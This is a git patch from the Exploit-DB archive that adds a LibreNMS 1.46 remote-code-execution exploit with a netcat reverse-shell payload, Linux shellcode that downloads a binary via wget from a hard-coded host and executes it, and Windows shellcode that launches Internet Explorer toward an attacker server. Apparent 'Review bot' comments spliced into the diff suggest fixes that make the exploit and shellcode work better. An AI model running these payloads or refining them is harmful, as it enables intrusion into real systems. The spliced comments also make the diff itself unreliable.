From 70484f5916093176a5e2da335c9249be78f893b5 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 29 Jun 2019 05:01:51 +0000
Subject: [PATCH] DB: 2019-06-29
3 changes to exploits/shellcodes
LibreNMS 1.46 - 'addhost' Remote Code Execution
Windows/x86 - Start iexplore.exe Shellcode (191 Bytes)
Linux/x86 - chmod + execute + hide output via /usr/bin/wget Shellcode (129 bytes)
---
 exploits/php/webapps/47044.py | 111 ++++++++++++++++++++++++++++++++
 files_exploits.csv | 1 +
 files_shellcodes.csv | 2 +
 shellcodes/linux_x86/47043.c | 113 +++++++++++++++++++++++++++++++++
 shellcodes/windows_x86/47042.c | 66 +++++++++++++++++++
 5 files changed, 293 insertions(+)
 create mode 100755 exploits/php/webapps/47044.py
 create mode 100644 shellcodes/linux_x86/47043.c
 create mode 100644 shellcodes/windows_x86/47042.c
diff --git a/exploits/php/webapps/47044.py b/exploits/php/webapps/47044.py
new file mode 100755
index 000000000..17ae8afb0
--- /dev/null
+++ b/exploits/php/webapps/47044.py
@@ -0,0 +1,111 @@
+#!/usr/bin/python
+
+'''
+# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution
+# Date: 24/12/2018
+# Exploit Author: Askar (@mohammadaskar2)
+# CVE : CVE-2018-20434
+# Vendor Homepage: https://www.librenms.org/
+# Version: v1.46
+# Tested on: Ubuntu 18.04 / PHP 7.2.10
+'''
+
+import requests
+from urllib import urlencode
+import sys
+
+if len(sys.argv) != 5:
+ print "[!] Usage : ./exploit.py http://www.example.com cookies rhost rport"
+ sys.exit(0)
+
+# target (user input)
+target = sys.argv[1]
+
+# cookies (user input)
+raw_cookies = sys.argv[2]
+
+# remote host to connect to
+rhost = sys.argv[3]
+
+# remote port to connect to
+rport = sys.argv[4]
+
+# hostname to use (change it if you want)
+hostname = "dummydevice"
+
+# payload to create reverse shell
+payload = "'$(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} {1} >/tmp/f) #".format(rhost, rport)
+
+# request headers
+headers = {
+ "Content-Type": "application/x-www-form-urlencoded",
+ "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101"
+ }
+
+# request cookies
+cookies = {}
+for cookie in raw_cookies.split(";"):
+ # print cookie
+ c = cookie.split("=")
+ cookies[c[0]] = c[1]
+
+
+def create_new_device(url):
+ raw_request = {
+ "hostname": hostname,
+ "snmp": "on",
+ "sysName": "",
+ "hardware": "",
+ "os": "",
+ "snmpver": "v2c",
+ "os_id": "",
+ "port": "",
+ "transport": "udp",
+ "port_assoc_mode": "ifIndex",
+ "community": payload,
+ "authlevel": "noAuthNoPriv",
+ "authname": "",
+ "authpass": "",
+ "cryptopass": "",
+ "authalgo": "MD5",
+ "cryptoalgo": "AES",
+ "force_add": "on",
+ "Submit": ""
+ }
+ full_url = url + "/addhost/"
+ request_body = urlencode(raw_request)
+
+ # send the device creation request
+ request = requests.post(
+ full_url, data=request_body, cookies=cookies, headers=headers
+ )
+ text = request.text
+ if "Device added" in text:
+ print "[+] Device Created Sucssfully"
+ return True
+ else:
+ print "[-] Cannot Create Device"
+ return False
+
+
+def request_exploit(url):
+ params = {
+ "id": "capture",
+ "format": "text",
+ "type": "snmpwalk",
+ "hostname": hostname
+ }
+
+ # send the payload call
+ request = requests.get(url + "/ajax_output.php",
+ params=params,
+ headers=headers,
+ cookies=cookies
+ )
+ text = request.text
+ if rhost in text:
+ print "[+] Done, check your nc !"
+
+
+if create_new_device(target):
+ request_exploit(target)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6088ddacd..1dd487cd1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -41438,3 +41438,4 @@ id,file,description,date,author,type,platform,port
 47035,exploits/aspx/webapps/47035.py,"BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal",2019-06-25,"Aaron Bishop",webapps,aspx,
 47036,exploits/php/webapps/47036.txt,"WordPress Plugin iLive 1.0.4 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
 47037,exploits/php/webapps/47037.txt,"WordPress Plugin Live Chat Unlimited 2.8.3 - Cross-Site Scripting",2019-06-25,m0ze,webapps,php,
+47044,exploits/php/webapps/47044.py,"LibreNMS 1.46 - 'addhost' Remote Code Execution",2019-06-28,Askar,webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 7691aa1a8..8643cb2d3 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
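Review bot: The cookie parser at `c = cookie.split("=")` / `cookies[c[0]] = c[1]` silently truncates any cookie whose value itself contains `=` (base64-style padding is the usual case) to the part before the second `=`, raises IndexError on a trailing `;` or a bare name, and keeps the leading space of ` name=value` pairs pasted from a browser so the cookie is sent under the wrong name; `name, _, value = cookie.strip().partition("=")` with empty names skipped handles all three. The script also leaves a permanent `dummydevice` entry whose SNMP community string stores the reverse-shell command, so the usage text should tell the operator to delete that device after the engagement rather than leave the payload in the target's database. Note the file is Python 2 only (`print` statements, `from urllib import urlencode`), which is worth stating in the header alongside "Tested on".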
@@ -974,3 +974,5 @@ id,file,description,date,author,type,platform
 47025,shellcodes/linux_x86-64/47025.c,"Linux/x86_64 - Reverse (0.0.0.0:4444/TCP) Shell (/bin/sh) Shellcode",2019-06-24,"Aron Mihaljevic",shellcode,linux_x86-64
 47040,shellcodes/linux_x86/47040.py,"Linux/x86 - ASCII AND_ SUB_ PUSH_ POPAD Encoder Shellcode",2019-06-27,"Petr Javorik",shellcode,linux_x86
 47041,shellcodes/windows_x86/47041.c,"Windows/x86 - bitsadmin Download and Execute (http://192.168.10.10/evil.exe _c:\evil.exe_) Shellcode (210 Bytes)",2019-06-27,"Joseph McDonagh",shellcode,windows_x86
+47042,shellcodes/windows_x86/47042.c,"Windows/x86 - Start iexplore.exe Shellcode (191 Bytes)",2019-06-28,"Joseph McDonagh",shellcode,windows_x86
+47043,shellcodes/linux_x86/47043.c,"Linux/x86 - chmod + execute + hide output via /usr/bin/wget Shellcode (129 bytes)",2019-06-28,LockedByte,shellcode,linux_x86
diff --git a/shellcodes/linux_x86/47043.c b/shellcodes/linux_x86/47043.c
new file mode 100644
index 000000000..8e38935b8
--- /dev/null
+++ b/shellcodes/linux_x86/47043.c
@@ -0,0 +1,113 @@
+/**
+
+; Shellcode 129 Bytes
+; download (via wget) + chmod + execute shellcode + hide output
+; Exec: /usr/bin/wget http://192.168.1.93//x > /dev/null 2>&1
+;
+
+global _start
+
+section .text
+
+_start:
+
+ ;fork
+ xor eax,eax
+ mov al,0x2
+ int 0x80
+ xor ebx,ebx
+ cmp eax,ebx
+ jz download
+
+ ; wait(NULL)
+ xor eax,eax
+ mov al,0x7
+ int 0x80
+
+ ; give execution permissions to the binary x
+ xor ecx,ecx
+ xor eax, eax
+ push eax
+ mov al, 0xf
+ push 0x78
+ mov ebx, esp
+ xor ecx, ecx
+ mov cx, 0x1ff
+ int 0x80
+
+ ; execution of binary x
+ xor eax, eax
+ push eax
+ push 0x78
+ mov ebx, esp
+ push eax
+ mov edx, esp
+ push ebx
+ mov ecx, esp
+ mov al, 11
+ int 0x80
+
+download:
+
+ push 0xb
+ pop eax
+ cdq
+ push edx
+ ; download uri
+ mov eax, 0x31263e32 ; 1&>2 hide_output[4]
+ mov eax, 0x6c6c756e ; llun/ hide_output[3]
+ mov eax, 0x2f766564 ; ved hide_output[2]
+ mov eax, 0x2f3e20 ; /> hide_output[1]
+ mov eax, 0x782f2f ; x// path[1]
+ mov eax, 0x33392e31 ;93.1 addr[3]
+ mov eax, 0x2e383631 ;.861 addr[2]
+ mov eax, 0x2e323931 ;.291 addr[1]
+ push eax
+ mov ecx,esp
+ push edx
+
+ ; download execution in /usr/bin/wget
+
+ push 0x74 ;t
+ push 0x6567772f ;egw/
+ push 0x6e69622f ;nib/
+ push 0x7273752f ;rsu/
+ mov ebx,esp
+ push edx
+ push ecx
+ push ebx
+ mov ecx,esp
+ int 0x80
+
+**/
+
+// nasm -felf32 wget.nasm -o wget.o
+// ld -m elf_i386 wget.o -o wget
+
+#include
+#include
+
+// gcc -z execstack -fno-stack-protector shellcode.c -o shellcode
+
+// SHELLCODE 129 Bytes
+
+char buf[] = "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8"
+"\x74\x2a\x31\xc0\xb0\x07\xcd\x80\x31\xc9"
+"\x31\xc0\x50\xb0\x0f\x6a\x78\x89\xe3\x31"
+"\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50"
+"\x6a\x78\x89\xe3\x50\x89\xe2\x53\x89\xe1"
+"\xb0\x0b\xcd\x80\x6a\x0b\x58\x99\x52\xb8"
+"\x32\x3e\x26\x31\xb8\x6e\x75\x6c\x6c\xb8"
+"\x64\x65\x76\x2f\xb8\x20\x3e\x2f\x00\xb8"
+"\x2f\x2f\x78\x00\xb8\x31\x2e\x39\x33\xb8"
+"\x31\x36\x38\x2e\xb8\x31\x39\x32\x2e\x50"
+"\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65"
+"\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72"
+"\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";
+
+void main(int argc, char **argv)
+{
+ int (*func)();
+ func = (int (*)()) buf;
+ (int)(*func)();
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/47042.c b/shellcodes/windows_x86/47042.c
new file mode 100644
index 000000000..e100ae39f
--- /dev/null
+++ b/shellcodes/windows_x86/47042.c
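Review bot: In the `download:` branch the eight URL dwords are written with `mov eax, imm32` instead of `push` (the byte array confirms it: each is `\xb8`, not `\x68`), so only the final `192.` dword reaches the stack and, because those moves run after `push 0xb` / `pop eax`, eax holds 0x2e323931 rather than 11 at the `int 0x80` — the child issues an invalid syscall and then runs off the end of the buffer instead of executing wget. Two of those immediates (`0x2f3e20`, `0x782f2f`) also embed NUL bytes, and `> /dev/null 2>&1` is shell syntax that execve never interprets; even with the pushes fixed, the NUL after `//x` terminates the argument there, so the "hide output" part of the title is not delivered by this code and would need `open("/dev/null")` plus `dup2` onto fds 1 and 2 before the execve. The branch below is what I would expect from the comments; `buf[]` then has to be regenerated from the fixed listing, and the `jz download` displacement stays valid only if the bytes before the label keep their length.
```c
download:
    cdq                      ; eax is 0 in the child, so edx = 0
    push edx                 ; NUL terminator
    push 0x31263e32          ; "2>&1"  (not interpreted by execve, see note)
    push 0x6c6c756e          ; "null"
    push 0x2f766564          ; "dev/"
    push 0x2f3e20            ; " >/"  (embeds a NUL)
    push 0x782f2f            ; "//x"  (embeds a NUL)
    push 0x33392e31          ; "1.93"
    push 0x2e383631          ; "168."
    push 0x2e323931          ; "192."
    mov ecx, esp             ; argv[1] -> URL string
    push edx
    /* … unchanged: build "/usr/bin/wget" in ebx and argv in ecx … */
    push 0xb
    pop eax                  ; set execve number after the pushes so nothing clobbers it
    int 0x80
```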
@@ -0,0 +1,66 @@
+/*
+# Title: start iexplore.exe
+# Author: Joseph McDonagh
+# Shellcode length 191
+# Could be smaller if the app your are exploiting loads msvcrt.
+# Purpose: Use the start command to open internet explorer and connect to a malicious web server
+# The command this runs is simply start iexplore.exe http://192.168.10.10/ (Attacker controlled server), which can lead to a more productive payload.
+# This code can exploit browser vulnerabilities without (or with) social engineering.
+# Tested on: WinXP SP 2
+# Thanks to Kartik Durg and sharing the shellcode entry 46281 and sharing the details on the iamroot blog https://iamroot.blog/2019/01/28/windows-shellcode-download-and-execute-payload-using-msiexec/. This got me going in the right direction. And to POB. Using "start" is helpful for this type of payload.
+# Complile on Kali #i686-w64-mingw32-gcc sie.c -o sie.exe
+#
+
+***** Assembly code follows *****
+
+; The portion loads msvcrt to make the syscall.
+; Hardcoded for winxp
+
+xor eax, eax
+mov ax, 0x7472
+push eax
+push dword 0x6376736d
+push esp
+
+; LoadLibrary (hardcoded for Windows XP.
+; Can find this on a debugger or arwin)
+mov ebx, 0x7c801d77
+call ebx
+mov ebp, eax
+
+xor eax, eax
+PUSH eax ; null terminator
+push 0x2f30312e ; /10.
+push 0x30312e38 ; 01.8
+push 0x36312e32 ; 61.2
+push 0x39312f2f ; 91//
+push 0x3a707474 ; :ptt
+push 0x68206578 ; h ex
+push 0x652e6572 ; e.er
+push 0x6f6c7078 ; olpx
+push 0x65692074 ; ei t
+push 0x72617473 ; rats
+
+; Below code moves the pointer and executes the system call that runs the command.
+
+mov edi,esp
+push edi
+mov eax, 0x77c293c7
+call eax
+
+xor eax, eax
+push eax
+mov eax, 0x7c81caa2
+call eax
+*/
+
+char code[]=
+
+"\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x77\x1d\x80\x7c\xff\xd3\x89\xc5\x31\xc0\x50\x68\x2e\x31\x30\x2f\x68\x38\x2e\x32\x36\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x78\x65\x20\x68\x68\x72\x65\x2e\x65\x68\x78\x70\x6c\x6f\x68\x74\x20\x69\x65\x68\x73\x74\x61\x72\x89\xe7\x57\xb8\xc7\x93\xc2\x77\xff\xd0\x31\xc0\x50\xb8\xa2\xca\x81\x7c\xff\xd0";
+
+int main(int argc, char **argv)
+ {
+int (*func)();
+func = (int (*)()) code;
+(int)(*func)();
+}
\ No newline at end of file
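Review bot: The `char code[]` array is 95 bytes, not the 191 that `# Shellcode length 191` and the CSV title state (191 looks like a hex-digit count plus one rather than a byte count), and the length is what a consumer sizes a buffer or a cave by, so the header should say `# Shellcode length 95`. The HMODULE saved by `mov ebp, eax` after the LoadLibrary call is never read, because the next two calls go to hard-coded XP addresses (`0x77c293c7`, presumably msvcrt's `system`, and `0x7c81caa2`, which the preceding `push 0` suggests is ExitProcess) instead of being resolved through GetProcAddress; a comment such as `; handle unused - LoadLibrary only ensures msvcrt is mapped, system() address below is hard-coded` would save the reader a search. The `push edi` / `call eax` is a cdecl call that never pops its argument, which is harmless only because the process exits immediately afterwards and is worth a one-line comment too.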